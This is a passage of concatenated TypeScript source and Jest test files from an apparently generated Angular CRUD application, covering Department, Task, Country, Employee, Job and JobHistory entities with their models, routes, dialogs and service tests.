<file_sep>import { ILocationMySuffix } from 'app/entities/location-my-suffix/location-my-suffix.model';
import { IEmployeeMySuffix } from 'app/entities/employee-my-suffix/employee-my-suffix.model';
/** Shape of a Department entity as exchanged with the REST API. */
export interface IDepartmentMySuffix {
  id?: string;
  departmentName?: string;
  location?: ILocationMySuffix | null;
  employees?: IEmployeeMySuffix[] | null;
}

/** Concrete Department implementation; fields are optional for new entities. */
export class DepartmentMySuffix implements IDepartmentMySuffix {
  constructor(
    public id?: string,
    public departmentName?: string,
    public location?: ILocationMySuffix | null,
    public employees?: IEmployeeMySuffix[] | null
  ) {}
}

/** Returns the department's primary key, or undefined when no id is set. */
export function getDepartmentMySuffixIdentifier(department: IDepartmentMySuffix): string | undefined {
  return department.id;
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
import { ICountryMySuffix, CountryMySuffix } from '../country-my-suffix.model';
import { IRegionMySuffix } from 'app/entities/region-my-suffix/region-my-suffix.model';
import { RegionMySuffixService } from 'app/entities/region-my-suffix/service/region-my-suffix.service';
import { CountryMySuffixUpdateComponent } from './country-my-suffix-update.component';
// Unit tests for CountryMySuffixUpdateComponent: relationship loading during
// ngOnInit, create/update dispatch in save(), and the trackBy helper.
describe('Component Tests', () => {
  describe('CountryMySuffix Management Update Component', () => {
    let comp: CountryMySuffixUpdateComponent;
    let fixture: ComponentFixture<CountryMySuffixUpdateComponent>;
    let activatedRoute: ActivatedRoute;
    let countryService: CountryMySuffixService;
    let regionService: RegionMySuffixService;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        declarations: [CountryMySuffixUpdateComponent],
        providers: [FormBuilder, ActivatedRoute],
      })
        // The template is irrelevant here; only component logic is tested.
        .overrideTemplate(CountryMySuffixUpdateComponent, '')
        .compileComponents();

      fixture = TestBed.createComponent(CountryMySuffixUpdateComponent);
      activatedRoute = TestBed.inject(ActivatedRoute);
      countryService = TestBed.inject(CountryMySuffixService);
      regionService = TestBed.inject(RegionMySuffixService);

      comp = fixture.componentInstance;
    });

    describe('ngOnInit', () => {
      it('Should call region query and add missing value', () => {
        const country: ICountryMySuffix = { id: 'CBA' };
        const region: IRegionMySuffix = { id: 'knowledge Usability' };
        country.region = region;

        const regionCollection: IRegionMySuffix[] = [{ id: 'schemas' }];
        spyOn(regionService, 'query').and.returnValue(of(new HttpResponse({ body: regionCollection })));
        const expectedCollection: IRegionMySuffix[] = [region, ...regionCollection];
        spyOn(regionService, 'addRegionMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ country });
        comp.ngOnInit();

        expect(regionService.query).toHaveBeenCalled();
        expect(regionService.addRegionMySuffixToCollectionIfMissing).toHaveBeenCalledWith(regionCollection, region);
        expect(comp.regionsCollection).toEqual(expectedCollection);
      });

      it('Should update editForm', () => {
        const country: ICountryMySuffix = { id: 'CBA' };
        const region: IRegionMySuffix = { id: 'De-engineered' };
        country.region = region;

        activatedRoute.data = of({ country });
        comp.ngOnInit();

        expect(comp.editForm.value).toEqual(expect.objectContaining(country));
        expect(comp.regionsCollection).toContain(region);
      });
    });

    describe('save', () => {
      it('Should call update service on save for existing entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const country = { id: 'ABC' };
        spyOn(countryService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ country });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: country }));
        saveSubject.complete();

        // THEN
        expect(comp.previousState).toHaveBeenCalled();
        expect(countryService.update).toHaveBeenCalledWith(country);
        expect(comp.isSaving).toEqual(false);
      });

      it('Should call create service on save for new entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const country = new CountryMySuffix();
        spyOn(countryService, 'create').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ country });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: country }));
        saveSubject.complete();

        // THEN
        expect(countryService.create).toHaveBeenCalledWith(country);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).toHaveBeenCalled();
      });

      it('Should set isSaving to false on error', () => {
        // GIVEN
        const saveSubject = new Subject();
        const country = { id: 'ABC' };
        spyOn(countryService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ country });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.error('This is an error!');

        // THEN
        expect(countryService.update).toHaveBeenCalledWith(country);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).not.toHaveBeenCalled();
      });
    });

    describe('Tracking relationships identifiers', () => {
      describe('trackRegionMySuffixById', () => {
        it('Should return tracked RegionMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackRegionMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });
    });
  });
});
<file_sep>import { IJobMySuffix } from 'app/entities/job-my-suffix/job-my-suffix.model';
/** Shape of a Task entity as exchanged with the REST API. */
export interface ITaskMySuffix {
  id?: string;
  title?: string | null;
  description?: string | null;
  jobs?: IJobMySuffix[] | null;
}

/** Concrete Task implementation; every field is optional/nullable. */
export class TaskMySuffix implements ITaskMySuffix {
  constructor(public id?: string, public title?: string | null, public description?: string | null, public jobs?: IJobMySuffix[] | null) {}
}

/** Returns the task's primary key, or undefined when no id is set. */
export function getTaskMySuffixIdentifier(task: ITaskMySuffix): string | undefined {
  return task.id;
}
<file_sep>import { NgModule } from '@angular/core';
import { RouterModule, Routes } from '@angular/router';
import { UserRouteAccessService } from 'app/core/auth/user-route-access.service';
import { TaskMySuffixComponent } from '../list/task-my-suffix.component';
import { TaskMySuffixDetailComponent } from '../detail/task-my-suffix-detail.component';
import { TaskMySuffixUpdateComponent } from '../update/task-my-suffix-update.component';
import { TaskMySuffixRoutingResolveService } from './task-my-suffix-routing-resolve.service';
// Child route table for the Task entity: list, detail view, create and edit.
// Every route is guarded by UserRouteAccessService; the view/new/edit routes
// resolve the entity through TaskMySuffixRoutingResolveService before the
// component is activated.
const taskRoute: Routes = [
  {
    path: '',
    component: TaskMySuffixComponent,
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/view',
    component: TaskMySuffixDetailComponent,
    resolve: {
      task: TaskMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: 'new',
    component: TaskMySuffixUpdateComponent,
    resolve: {
      task: TaskMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
  {
    path: ':id/edit',
    component: TaskMySuffixUpdateComponent,
    resolve: {
      task: TaskMySuffixRoutingResolveService,
    },
    canActivate: [UserRouteAccessService],
  },
];

/** Registers the Task entity routes with the Angular router. */
@NgModule({
  imports: [RouterModule.forChild(taskRoute)],
  exports: [RouterModule],
})
export class TaskMySuffixRoutingModule {}
<file_sep>import { Component, OnInit } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { NgbModal } from '@ng-bootstrap/ng-bootstrap';
import { ICountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
import { CountryMySuffixDeleteDialogComponent } from '../delete/country-my-suffix-delete-dialog.component';
/** Lists Country entities and hosts the delete confirmation dialog. */
@Component({
  selector: 'jhi-country-my-suffix',
  templateUrl: './country-my-suffix.component.html',
})
export class CountryMySuffixComponent implements OnInit {
  countries?: ICountryMySuffix[];
  isLoading = false;

  constructor(protected countryService: CountryMySuffixService, protected modalService: NgbModal) {}

  /** Fetches all countries, toggling the loading flag around the request. */
  loadAll(): void {
    this.isLoading = true;

    this.countryService.query().subscribe(
      (response: HttpResponse<ICountryMySuffix[]>) => {
        this.countries = response.body ?? [];
        this.isLoading = false;
      },
      () => {
        this.isLoading = false;
      }
    );
  }

  ngOnInit(): void {
    this.loadAll();
  }

  /** trackBy helper keyed on the country id. */
  trackId(index: number, item: ICountryMySuffix): string {
    return item.id!;
  }

  /** Opens the delete confirmation dialog; reloads the list after a deletion. */
  delete(country: ICountryMySuffix): void {
    const dialogRef = this.modalService.open(CountryMySuffixDeleteDialogComponent, { size: 'lg', backdrop: 'static' });
    dialogRef.componentInstance.country = country;
    // unsubscribe not needed because closed completes on modal close
    dialogRef.closed.subscribe(reason => {
      if (reason === 'deleted') {
        this.loadAll();
      }
    });
  }
}
<file_sep>import { Injectable } from '@angular/core';
import { HttpResponse } from '@angular/common/http';
import { Resolve, ActivatedRouteSnapshot, Router } from '@angular/router';
import { Observable, of, EMPTY } from 'rxjs';
import { mergeMap } from 'rxjs/operators';
import { ICountryMySuffix, CountryMySuffix } from '../country-my-suffix.model';
import { CountryMySuffixService } from '../service/country-my-suffix.service';
/**
 * Route resolver for Country: loads the entity referenced by the `:id` route
 * parameter before navigation, supplies a fresh CountryMySuffix when no id is
 * present, and redirects to the 404 page when the id cannot be found.
 */
@Injectable({ providedIn: 'root' })
export class CountryMySuffixRoutingResolveService implements Resolve<ICountryMySuffix> {
  constructor(protected service: CountryMySuffixService, protected router: Router) {}

  resolve(route: ActivatedRouteSnapshot): Observable<ICountryMySuffix> | Observable<never> {
    const id = route.params['id'];
    if (!id) {
      // No id on the route (e.g. the "new" route): start from an empty entity.
      return of(new CountryMySuffix());
    }
    return this.service.find(id).pipe(
      mergeMap((response: HttpResponse<CountryMySuffix>) => {
        const country = response.body;
        if (country) {
          return of(country);
        }
        // Unknown id: send the user to the 404 page and cancel navigation.
        this.router.navigate(['404']);
        return EMPTY;
      })
    );
  }
}
<file_sep>jest.mock('@angular/router');
import { ComponentFixture, TestBed } from '@angular/core/testing';
import { HttpResponse } from '@angular/common/http';
import { HttpClientTestingModule } from '@angular/common/http/testing';
import { FormBuilder } from '@angular/forms';
import { ActivatedRoute } from '@angular/router';
import { of, Subject } from 'rxjs';
import { EmployeeMySuffixService } from '../service/employee-my-suffix.service';
import { IEmployeeMySuffix, EmployeeMySuffix } from '../employee-my-suffix.model';
import { IDepartmentMySuffix } from 'app/entities/department-my-suffix/department-my-suffix.model';
import { DepartmentMySuffixService } from 'app/entities/department-my-suffix/service/department-my-suffix.service';
import { EmployeeMySuffixUpdateComponent } from './employee-my-suffix-update.component';
// Unit tests for EmployeeMySuffixUpdateComponent.
// Each spec stubs the route data and/or the entity services, calls ngOnInit(),
// then verifies that the edit form and relationship drop-downs were populated,
// and that save() delegates to create/update depending on the entity id.
// NOTE: spies must be installed BEFORE comp.ngOnInit() runs — the order of
// statements inside each spec is significant.
describe('Component Tests', () => {
  describe('EmployeeMySuffix Management Update Component', () => {
    let comp: EmployeeMySuffixUpdateComponent;
    let fixture: ComponentFixture<EmployeeMySuffixUpdateComponent>;
    let activatedRoute: ActivatedRoute;
    let employeeService: EmployeeMySuffixService;
    let departmentService: DepartmentMySuffixService;

    beforeEach(() => {
      // The template is overridden with an empty string: these are pure class tests.
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
        declarations: [EmployeeMySuffixUpdateComponent],
        providers: [FormBuilder, ActivatedRoute],
      })
        .overrideTemplate(EmployeeMySuffixUpdateComponent, '')
        .compileComponents();

      fixture = TestBed.createComponent(EmployeeMySuffixUpdateComponent);
      activatedRoute = TestBed.inject(ActivatedRoute);
      employeeService = TestBed.inject(EmployeeMySuffixService);
      departmentService = TestBed.inject(DepartmentMySuffixService);
      comp = fixture.componentInstance;
    });

    describe('ngOnInit', () => {
      it('Should call EmployeeMySuffix query and add missing value', () => {
        const employee: IEmployeeMySuffix = { id: 'CBA' };
        const manager: IEmployeeMySuffix = { id: '<NAME>' };
        employee.manager = manager;

        const employeeCollection: IEmployeeMySuffix[] = [{ id: 'Tuna' }];
        spyOn(employeeService, 'query').and.returnValue(of(new HttpResponse({ body: employeeCollection })));
        const additionalEmployeeMySuffixes = [manager];
        const expectedCollection: IEmployeeMySuffix[] = [...additionalEmployeeMySuffixes, ...employeeCollection];
        spyOn(employeeService, 'addEmployeeMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ employee });
        comp.ngOnInit();

        expect(employeeService.query).toHaveBeenCalled();
        // The manager already attached to the entity must be merged into the options.
        expect(employeeService.addEmployeeMySuffixToCollectionIfMissing).toHaveBeenCalledWith(
          employeeCollection,
          ...additionalEmployeeMySuffixes
        );
        expect(comp.employeesSharedCollection).toEqual(expectedCollection);
      });

      it('Should call DepartmentMySuffix query and add missing value', () => {
        const employee: IEmployeeMySuffix = { id: 'CBA' };
        const department: IDepartmentMySuffix = { id: 'Rupee AGP engage' };
        employee.department = department;

        const departmentCollection: IDepartmentMySuffix[] = [{ id: '4th metrics' }];
        spyOn(departmentService, 'query').and.returnValue(of(new HttpResponse({ body: departmentCollection })));
        const additionalDepartmentMySuffixes = [department];
        const expectedCollection: IDepartmentMySuffix[] = [...additionalDepartmentMySuffixes, ...departmentCollection];
        spyOn(departmentService, 'addDepartmentMySuffixToCollectionIfMissing').and.returnValue(expectedCollection);

        activatedRoute.data = of({ employee });
        comp.ngOnInit();

        expect(departmentService.query).toHaveBeenCalled();
        expect(departmentService.addDepartmentMySuffixToCollectionIfMissing).toHaveBeenCalledWith(
          departmentCollection,
          ...additionalDepartmentMySuffixes
        );
        expect(comp.departmentsSharedCollection).toEqual(expectedCollection);
      });

      it('Should update editForm', () => {
        const employee: IEmployeeMySuffix = { id: 'CBA' };
        const manager: IEmployeeMySuffix = { id: 'Handmade Assistant' };
        employee.manager = manager;
        const department: IDepartmentMySuffix = { id: 'open-source' };
        employee.department = department;

        activatedRoute.data = of({ employee });
        comp.ngOnInit();

        expect(comp.editForm.value).toEqual(expect.objectContaining(employee));
        expect(comp.employeesSharedCollection).toContain(manager);
        expect(comp.departmentsSharedCollection).toContain(department);
      });
    });

    describe('save', () => {
      it('Should call update service on save for existing entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const employee = { id: 'ABC' };
        spyOn(employeeService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ employee });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        // Emitting on the subject simulates the HTTP response arriving.
        saveSubject.next(new HttpResponse({ body: employee }));
        saveSubject.complete();

        // THEN
        expect(comp.previousState).toHaveBeenCalled();
        expect(employeeService.update).toHaveBeenCalledWith(employee);
        expect(comp.isSaving).toEqual(false);
      });

      it('Should call create service on save for new entity', () => {
        // GIVEN
        const saveSubject = new Subject();
        const employee = new EmployeeMySuffix();
        spyOn(employeeService, 'create').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ employee });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.next(new HttpResponse({ body: employee }));
        saveSubject.complete();

        // THEN
        expect(employeeService.create).toHaveBeenCalledWith(employee);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).toHaveBeenCalled();
      });

      it('Should set isSaving to false on error', () => {
        // GIVEN
        const saveSubject = new Subject();
        const employee = { id: 'ABC' };
        spyOn(employeeService, 'update').and.returnValue(saveSubject);
        spyOn(comp, 'previousState');
        activatedRoute.data = of({ employee });
        comp.ngOnInit();

        // WHEN
        comp.save();
        expect(comp.isSaving).toEqual(true);
        saveSubject.error('This is an error!');

        // THEN: the save flag resets but no navigation happens on failure.
        expect(employeeService.update).toHaveBeenCalledWith(employee);
        expect(comp.isSaving).toEqual(false);
        expect(comp.previousState).not.toHaveBeenCalled();
      });
    });

    describe('Tracking relationships identifiers', () => {
      describe('trackEmployeeMySuffixById', () => {
        it('Should return tracked EmployeeMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackEmployeeMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });

      describe('trackDepartmentMySuffixById', () => {
        it('Should return tracked DepartmentMySuffix primary key', () => {
          const entity = { id: 'ABC' };
          const trackResult = comp.trackDepartmentMySuffixById(0, entity);
          expect(trackResult).toEqual(entity.id);
        });
      });
    });
  });
});
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import * as dayjs from 'dayjs';
import { DATE_TIME_FORMAT } from 'app/config/input.constants';
import { Language } from 'app/entities/enumerations/language.model';
import { IJobHistoryMySuffix, JobHistoryMySuffix } from '../job-history-my-suffix.model';
import { JobHistoryMySuffixService } from './job-history-my-suffix.service';
// Unit tests for JobHistoryMySuffixService.
// Each spec issues a request through the service, flushes a canned response via
// HttpTestingController, and checks the deserialised result (date fields travel
// as DATE_TIME_FORMAT strings and come back as dayjs instances).
describe('Service Tests', () => {
  describe('JobHistoryMySuffix Service', () => {
    let service: JobHistoryMySuffixService;
    let httpMock: HttpTestingController;
    let elemDefault: IJobHistoryMySuffix;
    let expectedResult: IJobHistoryMySuffix | IJobHistoryMySuffix[] | boolean | null;
    let currentDate: dayjs.Dayjs;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
      });
      expectedResult = null;
      service = TestBed.inject(JobHistoryMySuffixService);
      httpMock = TestBed.inject(HttpTestingController);
      currentDate = dayjs();

      elemDefault = {
        id: 'AAAAAAA',
        startDate: currentDate,
        endDate: currentDate,
        language: Language.FRENCH,
      };
    });

    describe('Service methods', () => {
      it('should find an element', () => {
        // The server representation carries formatted date strings.
        const returnedFromService = Object.assign(
          {
            startDate: currentDate.format(DATE_TIME_FORMAT),
            endDate: currentDate.format(DATE_TIME_FORMAT),
          },
          elemDefault
        );

        service.find('ABC').subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(elemDefault);
      });

      it('should create a JobHistoryMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'ID',
            startDate: currentDate.format(DATE_TIME_FORMAT),
            endDate: currentDate.format(DATE_TIME_FORMAT),
          },
          elemDefault
        );

        const expected = Object.assign(
          {
            startDate: currentDate,
            endDate: currentDate,
          },
          returnedFromService
        );

        service.create(new JobHistoryMySuffix()).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'POST' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should update a JobHistoryMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            startDate: currentDate.format(DATE_TIME_FORMAT),
            endDate: currentDate.format(DATE_TIME_FORMAT),
            language: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign(
          {
            startDate: currentDate,
            endDate: currentDate,
          },
          returnedFromService
        );

        service.update(expected).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PUT' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should partial update a JobHistoryMySuffix', () => {
        // Only a subset of fields is sent in a PATCH request.
        const patchObject = Object.assign(
          {
            language: 'BBBBBB',
          },
          new JobHistoryMySuffix()
        );

        const returnedFromService = Object.assign(patchObject, elemDefault);

        const expected = Object.assign(
          {
            startDate: currentDate,
            endDate: currentDate,
          },
          returnedFromService
        );

        service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PATCH' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should return a list of JobHistoryMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            startDate: currentDate.format(DATE_TIME_FORMAT),
            endDate: currentDate.format(DATE_TIME_FORMAT),
            language: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign(
          {
            startDate: currentDate,
            endDate: currentDate,
          },
          returnedFromService
        );

        service.query().subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush([returnedFromService]);
        httpMock.verify();
        expect(expectedResult).toContainEqual(expected);
      });

      it('should delete a JobHistoryMySuffix', () => {
        service.delete('ABC').subscribe(resp => (expectedResult = resp.ok));

        const req = httpMock.expectOne({ method: 'DELETE' });
        req.flush({ status: 200 });
        // Fix: the original `expect(expectedResult);` had no matcher and asserted nothing.
        expect(expectedResult).toBe(true);
      });

      describe('addJobHistoryMySuffixToCollectionIfMissing', () => {
        it('should add a JobHistoryMySuffix to an empty array', () => {
          const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
          expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing([], jobHistory);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(jobHistory);
        });

        it('should not add a JobHistoryMySuffix to an array that contains it', () => {
          const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
          const jobHistoryCollection: IJobHistoryMySuffix[] = [
            {
              ...jobHistory,
            },
            { id: 'CBA' },
          ];
          expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing(jobHistoryCollection, jobHistory);
          expect(expectedResult).toHaveLength(2);
        });

        it("should add a JobHistoryMySuffix to an array that doesn't contain it", () => {
          const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
          const jobHistoryCollection: IJobHistoryMySuffix[] = [{ id: 'CBA' }];
          expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing(jobHistoryCollection, jobHistory);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(jobHistory);
        });

        it('should add only unique JobHistoryMySuffix to an array', () => {
          const jobHistoryArray: IJobHistoryMySuffix[] = [{ id: 'ABC' }, { id: 'CBA' }, { id: 'B2C solid Future' }];
          const jobHistoryCollection: IJobHistoryMySuffix[] = [{ id: 'ABC' }];
          expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing(jobHistoryCollection, ...jobHistoryArray);
          expect(expectedResult).toHaveLength(3);
        });

        it('should accept varargs', () => {
          const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
          const jobHistory2: IJobHistoryMySuffix = { id: 'CBA' };
          expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing([], jobHistory, jobHistory2);
          expect(expectedResult).toHaveLength(2);
          expect(expectedResult).toContain(jobHistory);
          expect(expectedResult).toContain(jobHistory2);
        });

        it('should accept null and undefined values', () => {
          const jobHistory: IJobHistoryMySuffix = { id: 'ABC' };
          expectedResult = service.addJobHistoryMySuffixToCollectionIfMissing([], null, jobHistory, undefined);
          expect(expectedResult).toHaveLength(1);
          expect(expectedResult).toContain(jobHistory);
        });
      });
    });

    afterEach(() => {
      // Fails the spec if any HTTP request was made but not flushed above.
      httpMock.verify();
    });
  });
});
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { ITaskMySuffix } from '../task-my-suffix.model';
import { TaskMySuffixService } from '../service/task-my-suffix.service';
@Component({
  templateUrl: './task-my-suffix-delete-dialog.component.html',
})
export class TaskMySuffixDeleteDialogComponent {
  /** Entity to delete; assigned by the opener through componentInstance. */
  task?: ITaskMySuffix;

  constructor(protected taskService: TaskMySuffixService, public activeModal: NgbActiveModal) {}

  /** Dismisses the dialog without touching the entity. */
  cancel(): void {
    this.activeModal.dismiss();
  }

  /** Deletes the task on the server, then closes the dialog with the 'deleted' reason. */
  confirmDelete(id: string): void {
    this.taskService.delete(id).subscribe(() => this.activeModal.close('deleted'));
  }
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { JobMySuffixComponent } from './list/job-my-suffix.component';
import { JobMySuffixDetailComponent } from './detail/job-my-suffix-detail.component';
import { JobMySuffixUpdateComponent } from './update/job-my-suffix-update.component';
import { JobMySuffixDeleteDialogComponent } from './delete/job-my-suffix-delete-dialog.component';
import { JobMySuffixRoutingModule } from './route/job-my-suffix-routing.module';
// Feature module bundling every CRUD screen for the JobMySuffix entity
// (list, detail, create/edit form and the delete confirmation dialog).
@NgModule({
  imports: [SharedModule, JobMySuffixRoutingModule],
  declarations: [JobMySuffixComponent, JobMySuffixDetailComponent, JobMySuffixUpdateComponent, JobMySuffixDeleteDialogComponent],
  // The delete dialog is instantiated dynamically via NgbModal, hence entryComponents.
  entryComponents: [JobMySuffixDeleteDialogComponent],
})
export class JobMySuffixModule {}
<file_sep>import { Component } from '@angular/core';
import { NgbActiveModal } from '@ng-bootstrap/ng-bootstrap';
import { IJobMySuffix } from '../job-my-suffix.model';
import { JobMySuffixService } from '../service/job-my-suffix.service';
@Component({
  templateUrl: './job-my-suffix-delete-dialog.component.html',
})
export class JobMySuffixDeleteDialogComponent {
  /** Entity to delete; assigned by the opener through componentInstance. */
  job?: IJobMySuffix;

  constructor(protected jobService: JobMySuffixService, public activeModal: NgbActiveModal) {}

  /** Dismisses the dialog without touching the entity. */
  cancel(): void {
    this.activeModal.dismiss();
  }

  /** Deletes the job on the server, then closes the dialog with the 'deleted' reason. */
  confirmDelete(id: string): void {
    this.jobService.delete(id).subscribe(() => this.activeModal.close('deleted'));
  }
}
<file_sep>import { IRegionMySuffix } from 'app/entities/region-my-suffix/region-my-suffix.model';
/** Shape of a Country entity as exchanged with the REST API. */
export interface ICountryMySuffix {
  id?: string;
  countryName?: string | null;
  region?: IRegionMySuffix | null;
}

/** Concrete ICountryMySuffix used when building new (unsaved) entities. */
export class CountryMySuffix implements ICountryMySuffix {
  constructor(public id?: string, public countryName?: string | null, public region?: IRegionMySuffix | null) {}
}

/** Returns the primary key of a country, or undefined for an unsaved entity. */
export function getCountryMySuffixIdentifier(country: ICountryMySuffix): string | undefined {
  const { id } = country;
  return id;
}
<file_sep>import { NgModule } from '@angular/core';
import { SharedModule } from 'app/shared/shared.module';
import { CountryMySuffixComponent } from './list/country-my-suffix.component';
import { CountryMySuffixDetailComponent } from './detail/country-my-suffix-detail.component';
import { CountryMySuffixUpdateComponent } from './update/country-my-suffix-update.component';
import { CountryMySuffixDeleteDialogComponent } from './delete/country-my-suffix-delete-dialog.component';
import { CountryMySuffixRoutingModule } from './route/country-my-suffix-routing.module';
// Feature module bundling every CRUD screen for the CountryMySuffix entity
// (list, detail, create/edit form and the delete confirmation dialog).
@NgModule({
  imports: [SharedModule, CountryMySuffixRoutingModule],
  declarations: [
    CountryMySuffixComponent,
    CountryMySuffixDetailComponent,
    CountryMySuffixUpdateComponent,
    CountryMySuffixDeleteDialogComponent,
  ],
  // The delete dialog is instantiated dynamically via NgbModal, hence entryComponents.
  entryComponents: [CountryMySuffixDeleteDialogComponent],
})
export class CountryMySuffixModule {}
<file_sep>import { TestBed } from '@angular/core/testing';
import { HttpClientTestingModule, HttpTestingController } from '@angular/common/http/testing';
import { IDepartmentMySuffix, DepartmentMySuffix } from '../department-my-suffix.model';
import { DepartmentMySuffixService } from './department-my-suffix.service';
// Unit tests for DepartmentMySuffixService.
// Each spec issues a request through the service, flushes a canned response via
// HttpTestingController, and checks the deserialised result.
describe('Service Tests', () => {
  describe('DepartmentMySuffix Service', () => {
    let service: DepartmentMySuffixService;
    let httpMock: HttpTestingController;
    let elemDefault: IDepartmentMySuffix;
    let expectedResult: IDepartmentMySuffix | IDepartmentMySuffix[] | boolean | null;

    beforeEach(() => {
      TestBed.configureTestingModule({
        imports: [HttpClientTestingModule],
      });
      expectedResult = null;
      service = TestBed.inject(DepartmentMySuffixService);
      httpMock = TestBed.inject(HttpTestingController);

      elemDefault = {
        id: 'AAAAAAA',
        departmentName: 'AAAAAAA',
      };
    });

    describe('Service methods', () => {
      it('should find an element', () => {
        const returnedFromService = Object.assign({}, elemDefault);

        service.find('ABC').subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(elemDefault);
      });

      it('should create a DepartmentMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'ID',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.create(new DepartmentMySuffix()).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'POST' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should update a DepartmentMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            departmentName: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.update(expected).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PUT' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should partial update a DepartmentMySuffix', () => {
        // PATCH carries only the fields being changed (none in this minimal case).
        const patchObject = Object.assign({}, new DepartmentMySuffix());

        const returnedFromService = Object.assign(patchObject, elemDefault);

        const expected = Object.assign({}, returnedFromService);

        service.partialUpdate(patchObject).subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'PATCH' });
        req.flush(returnedFromService);
        expect(expectedResult).toMatchObject(expected);
      });

      it('should return a list of DepartmentMySuffix', () => {
        const returnedFromService = Object.assign(
          {
            id: 'BBBBBB',
            departmentName: 'BBBBBB',
          },
          elemDefault
        );

        const expected = Object.assign({}, returnedFromService);

        service.query().subscribe(resp => (expectedResult = resp.body));

        const req = httpMock.expectOne({ method: 'GET' });
        req.flush([returnedFromService]);
        httpMock.verify();
        expect(expectedResult).toContainEqual(expected);
      });

      it('should delete a DepartmentMySuffix', () => {
